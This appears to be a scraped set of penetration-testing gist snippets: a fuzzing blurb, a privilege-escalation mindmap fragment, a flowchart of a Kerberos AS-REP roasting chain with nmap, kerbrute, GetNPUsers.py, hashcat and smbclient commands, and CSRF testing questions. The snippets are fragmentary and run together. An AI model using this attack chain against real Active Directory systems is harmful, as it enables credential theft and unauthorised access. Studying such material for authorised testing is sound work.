what does this product do?
Fuzzing is the act of testing software for vulnerabilities by injecting mutated or iterated data.
This gist mostly lists tools for web app fuzzing, but a couple for binary file fuzzing too.
The general SOP for app fuzzing seems to be: recon, enumeration, then fuzzing
# 0xConda's Linux Privilege Escalation mindmap | |
## Credential Access | |
- reused passwords | |
- credentials from configuration files | |
- credentials from local db |
source 😽
-
reused passwords
-
credentials from configuration files
graph TD
kerberos-hacking-v1
1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
A[is kerberos running? -- typically port 88] --> B
B[find Active Directory domain names] -->|enum4linux $IP| C
C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
sed -i 's/.$//' file
cat file | xargs -i% ping -c 1 %
cat DOMAINS.txt | xargs -i{} timeout 2 ping -q -c 2 {} | awk -F'[()]' '/PING/{print $2}' | tee IPs.txt
https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w
-
How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is CSRF token tied to account? Session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.
-
Is caching implemented?